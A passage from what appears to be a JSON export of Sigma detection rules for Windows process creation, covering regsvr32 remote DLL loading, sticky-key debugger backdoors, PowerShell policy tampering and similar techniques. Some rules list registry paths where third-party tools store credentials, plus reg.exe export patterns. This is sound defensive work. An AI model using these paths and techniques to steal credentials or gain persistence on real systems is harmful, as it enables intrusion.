keys\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml",
    "content": "title: DLL Execution Via Register-cimprovider.exe\nid: a2910908-e86f-4687-aeba-76a5f996e652\nstatus: test\ndescription: Detects using register-cimprovider.exe to execute arbitrary dll file.\nreferences:\n    - https://twitter.com/PhilipTsukerman/status/992021361106268161\n    - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\nauthor: Ivan Dyachkov, Yulia Fomina, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\register-cimprovider.exe'\n        CommandLine|contains|all:\n            - '-path'\n            - 'dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml",
    "content": "title: Enumeration for 3rd Party Creds From CLI\nid: 87a476dc-0079-4583-a985-dee7a20a03de\nrelated:\n    - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1\n      type: derived\n    - id: cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\n      type: similar\nstatus: test\ndescription: Detects processes that query known 3rd party registry keys that holds credentials via commandline\nreferences:\n    - https://isc.sans.edu/diary/More+Data+Exfiltration/25698\n    - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt\n    - https://github.com/HyperSine/how-does-MobaXterm-encrypt-password\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: # Add more paths as they are discovered\n            - '\\Software\\Aerofox\\Foxmail\\V3.1'\n            - '\\Software\\Aerofox\\FoxmailPreview'\n            - '\\Software\\DownloadManager\\Passwords'\n            - '\\Software\\FTPWare\\COREFTP\\Sites'\n            - '\\Software\\IncrediMail\\Identities'\n            - '\\Software\\Martin Prikryl\\WinSCP 2\\Sessions'\n            - '\\Software\\Mobatek\\MobaXterm\\'\n            - '\\Software\\OpenSSH\\Agent\\Keys'\n            - '\\Software\\OpenVPN-GUI\\configs'\n            - '\\Software\\ORL\\WinVNC3\\Password'\n            - '\\Software\\Qualcomm\\Eudora\\CommandLine'\n            - '\\Software\\RealVNC\\WinVNC4'\n            - '\\Software\\RimArts\\B2\\Settings'\n            - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n            - '\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\'\n            - '\\Software\\Sota\\FFFTP'\n            - '\\Software\\TightVNC\\Server'\n            - 
'\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin'\n    filter_main_other_rule:  # matched by cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\n        Image|endswith: 'reg.exe'\n        CommandLine|contains:\n            - 'export'\n            - 'save'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_export_of_thirdparty_creds.yml",
    "content": "title: Registry Export of Third-Party Credentials\nid: cc1abf27-78a3-4ac5-a51c-f3070b1d8e40\nrelated:\n    - id: 87a476dc-0079-4583-a985-dee7a20a03de\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe to export registry paths associated with third-party credentials.\n    Credential stealers have been known to use this technique to extract sensitive information from the registry.\nreferences:\n    - https://www.virustotal.com/gui/file/fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789/behavior\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1552.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_cli_save:\n        CommandLine|contains:\n            - 'save'\n            - 'export'\n    selection_cli_path:\n        CommandLine|contains:\n            - '\\Software\\Aerofox\\Foxmail\\V3.1'\n            - '\\Software\\Aerofox\\FoxmailPreview'\n            - '\\Software\\DownloadManager\\Passwords'\n            - '\\Software\\FTPWare\\COREFTP\\Sites'\n            - '\\Software\\IncrediMail\\Identities'\n            - '\\Software\\Martin Prikryl\\WinSCP 2\\Sessions'\n            - '\\Software\\Mobatek\\MobaXterm'\n            - '\\Software\\OpenSSH\\Agent\\Keys'\n            - '\\Software\\OpenVPN-GUI\\configs'\n            - '\\Software\\ORL\\WinVNC3\\Password'\n            - '\\Software\\Qualcomm\\Eudora\\CommandLine'\n            - '\\Software\\RealVNC\\WinVNC4'\n            - '\\Software\\RimArts\\B2\\Settings'\n            - '\\Software\\SimonTatham\\PuTTY\\Sessions'\n            - '\\Software\\SimonTatham\\PuTTY\\SshHostKeys'\n            - '\\Software\\Sota\\FFFTP'\n            - '\\Software\\TightVNC\\Server'\n            - 
'\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml",
    "content": "title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI\nid: 10344bb3-7f65-46c2-b915-2d00d47be5b0\nrelated:\n    - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\nreferences:\n    - https://twitter.com/M_haggis/status/1699056847154725107\n    - https://twitter.com/JAMESWT_MHT/status/1699042827261391247\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\n    - https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults'\n            - 'http'\n            - ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml",
    "content": "title: Suspicious Debugger Registration Cmdline\nid: ae215552-081e-44c7-805f-be16f975c8a2\nstatus: test\ndescription: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).\nreferences:\n    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/\n    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nauthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro\ndate: 2019-09-06\nmodified: 2022-08-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: '\\CurrentVersion\\Image File Execution Options\\'\n    selection2:\n        CommandLine|contains:\n            - 'sethc.exe'\n            - 'utilman.exe'\n            - 'osk.exe'\n            - 'magnify.exe'\n            - 'narrator.exe'\n            - 'displayswitch.exe'\n            - 'atbroker.exe'\n            - 'HelpPane.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_logon_script.yml",
    "content": "title: Potential Persistence Via Logon Scripts - CommandLine\nid: 21d856f9-9281-4ded-9377-51a1a6e2a432\nrelated:\n    - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458\n      type: derived\nstatus: test\ndescription: Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence\nreferences:\n    - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2023-06-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1037.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'UserInitMprLogonScript'\n    condition: selection\nfalsepositives:\n    - Legitimate addition of Logon Scripts via the command line by administrators or third party tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml",
    "content": "title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI\nid: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77\nrelated:\n    - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701\n      type: similar\nstatus: test\ndescription: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\n    - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-02-02\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\System\\CurrentControlSet\\Services\\'\n            - '\\NetworkProvider'\n    # filter:\n    #     CommandLine|contains:\n    #         - '\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider'\n    #         - '\\System\\CurrentControlSet\\Services\\P9NP\\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV\n    condition: selection\nfalsepositives:\n    - Other legitimate network providers used and not filtred in this rule\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml",
    "content": "title: Python Function Execution Security Warning Disabled In Excel\nid: 023c654f-8f16-44d9-bb2b-00ff36a62af9\nrelated:\n    - id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\n    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\nreferences:\n    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327\nauthor: '@Kostastsale'\ndate: 2023-08-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\Microsoft\\Office\\'\n            - '\\Excel\\Security'\n            - 'PythonFunctionWarnings'\n        CommandLine|contains: ' 0'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml",
    "content": "title: Potential Privilege Escalation via Service Permissions Weakness\nid: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981\nstatus: test\ndescription: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/\nauthor: Teymur Kheirkhabarov\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n        CommandLine|contains|all:\n            - 'ControlSet'\n            - 'services'\n        CommandLine|contains:\n            - '\\ImagePath'\n            - '\\FailureCommand'\n            - '\\ServiceDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml",
    "content": "title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution\nid: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'SOFTWARE\\Microsoft\\Provisioning\\Commands\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml",
    "content": "title: Potential PowerShell Execution Policy Tampering - ProcCreation\nid: cf2e938e-9a3e-4fe8-a347-411642b28a9f\nrelated:\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine\nreferences:\n    - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_path:\n        CommandLine|contains:\n            - '\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy'\n            - '\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy'\n    selection_values:\n        CommandLine|contains:\n            - 'Bypass'\n            - 'RemoteSigned'\n            - 'Unrestricted'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml",
    "content": "title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine\nid: 9ec9fb1b-e059-4489-9642-f270c207923d\nrelated:\n    - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.\nreferences:\n    - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n    - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n    - https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: '@Kostastsale, TheDFIRReport'\ndate: 2022-05-14\nmodified: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1564.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'\n            - 'add'\n            - '/v'\n            - '/d 0'\n    condition: selection\nfalsepositives:\n    - System administrator activities\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml",
    "content": "title: Persistence Via TypedPaths - CommandLine\nid: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba\nstatus: test\ndescription: Detects modification of or addition to the 'TypedPaths' key in the user or admin registry via the command line, which might indicate a persistence attempt\nreferences:\n    - https://twitter.com/dez_/status/1560101453150257154\n    - https://forensafe.com/blogs/typedpaths.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\ntags:\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml",
    "content": "title: Potential Regsvr32 Commandline Flag Anomaly\nid: b236190c-1c61-41e9-84b3-3fe03f6d76b0\nstatus: test\ndescription: Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.\nreferences:\n    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-07-13\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|windash: ' -i:'\n    filter_main_flag:\n        CommandLine|contains|windash: ' -n '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrator typo might cause some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml",
    "content": "title: Potentially Suspicious Regsvr32 HTTP IP Pattern\nid: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8\nstatus: test\ndescription: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\n    - https://twitter.com/tccontre18/status/1480950986650832903\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_ip:\n        CommandLine|contains:\n            - ' /i:http://1'\n            - ' /i:http://2'\n            - ' /i:http://3'\n            - ' /i:http://4'\n            - ' /i:http://5'\n            - ' /i:http://6'\n            - ' /i:http://7'\n            - ' /i:http://8'\n            - ' /i:http://9'\n            - ' /i:https://1'\n            - ' /i:https://2'\n            - ' /i:https://3'\n            - ' /i:https://4'\n            - ' /i:https://5'\n            - ' /i:https://6'\n            - ' /i:https://7'\n            - ' /i:https://8'\n            - ' /i:https://9'\n            - ' -i:http://1'\n            - ' -i:http://2'\n            - ' -i:http://3'\n            - ' -i:http://4'\n            - ' -i:http://5'\n            - ' -i:http://6'\n            - ' -i:http://7'\n            - ' -i:http://8'\n            - ' -i:http://9'\n            - ' -i:https://1'\n            - ' -i:https://2'\n            - ' -i:https://3'\n            - ' -i:https://4'\n            - ' -i:https://5'\n            - ' -i:https://6'\n            - ' -i:https://7'\n            - ' -i:https://8'\n            - ' -i:https://9'\n    condition: all of selection_*\nfalsepositives:\n    - FQDNs that start with a number such as \"7-Zip\"\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml",
    "content": "title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern\nid: 867356ee-9352-41c9-a8f2-1be690d78216\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.\nreferences:\n    - https://twitter.com/mrd0x/status/1461041276514623491\n    - https://twitter.com/tccontre18/status/1480950986650832903\n    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-24\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_flag:\n        CommandLine|contains:\n            - ' /i'\n            - ' -i'\n    selection_protocol:\n        CommandLine|contains:\n            - 'ftp'\n            - 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml",
    "content": "title: Suspicious Regsvr32 Execution From Remote Share\nid: 88a87a10-384b-4ad7-8871-2f9bf9259ce5\nstatus: test\ndescription: Detects REGSVR32.exe executing a DLL hosted on a remote share\nreferences:\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cli:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Decrease to medium if this is something common in your org\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process Of Regsvr32\nid: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects potentially suspicious child processes of \"regsvr32.exe\".\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-april-2022/\n    - https://www.echotrail.io/insights/search/regsvr32.exe\n    - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\nauthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-05\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\regsvr32.exe'\n        Image|endswith:\n            - '\\calc.exe'\n            - '\\cscript.exe'\n            - '\\explorer.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\nltest.exe'\n            - '\\notepad.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\schtasks.exe'\n            - '\\werfault.exe'\n            - '\\wscript.exe'\n    filter_main_werfault:\n        Image|endswith: '\\werfault.exe'\n        CommandLine|contains: ' -u -p '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely, but can rarely occur. Apply additional filters accordingly.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml",
    "content": "title: Regsvr32 Execution From Potential Suspicious Location\nid: 9525dc73-0327-438c-8c04-13c0e037e9da\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.\nreferences:\n    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers might execute \"regsvr32\" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml",
    "content": "title: Regsvr32 Execution From Highly Suspicious Location\nid: 327ff235-94eb-4f06-b9de-aaee571324be\nstatus: test\ndescription: Detects execution of regsvr32 where the DLL is located in a highly suspicious location\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_path_1:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - '\\Windows\\Registration\\CRMLog'\n            - '\\Windows\\System32\\com\\dmp\\'\n            - '\\Windows\\System32\\FxsTmp\\'\n            - '\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - '\\Windows\\System32\\spool\\drivers\\color\\'\n            - '\\Windows\\System32\\spool\\PRINTERS\\'\n            - '\\Windows\\System32\\spool\\SERVERS\\'\n            - '\\Windows\\System32\\Tasks_Migrated\\'\n            - '\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - '\\Windows\\SysWOW64\\com\\dmp\\'\n            - '\\Windows\\SysWOW64\\FxsTmp\\'\n            - '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - '\\Windows\\Tasks\\'\n            - '\\Windows\\Tracing\\'\n    selection_path_2:\n        CommandLine|contains:\n            # This is to avoid collisions with CLI starting with \"C:\\\"\n            - ' \"C:\\'\n            - ' C:\\'\n            - \" 'C:\\\\\"\n            - 'D:\\'\n    selection_exclude_known_dirs:\n        CommandLine|contains:\n            # Note: add additional locations that are related to third party applications\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\'\n            # Note: The spaces added here are to avoid collisions with the \"regsvr32\" binary full path\n            - ' C:\\Windows\\'\n            - ' \"C:\\Windows\\'\n            - \" 'C:\\\\Windows\\\\\"\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_null:\n        CommandLine: null\n    condition: selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml",
    "content": "title: Regsvr32 DLL Execution With Suspicious File Extension\nid: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e\nrelated:\n    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\n      type: obsolete\nstatus: test\ndescription: Detects the execution of REGSVR32.exe with DLL files masquerading as other files\nreferences:\n    - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://guides.lib.umich.edu/c.php?g=282942&p=1885348\n    - https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2021-11-29\nmodified: 2025-08-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            # Add more image extensions\n            # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3\n            - '.bin'\n            - '.bmp'\n            - '.cr2'\n            - '.dat'\n            - '.eps'\n            - '.gif'\n            - '.ico'\n            - '.jpeg'\n            - '.jpg'\n            - '.log'\n            - '.nef'\n            - '.orf'\n            - '.png'\n            - '.raw'\n            - '.rtf'\n            - '.sr2'\n            - '.temp'\n            - '.tif'\n            - '.tiff'\n            - '.tmp'\n            - '.txt'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml",
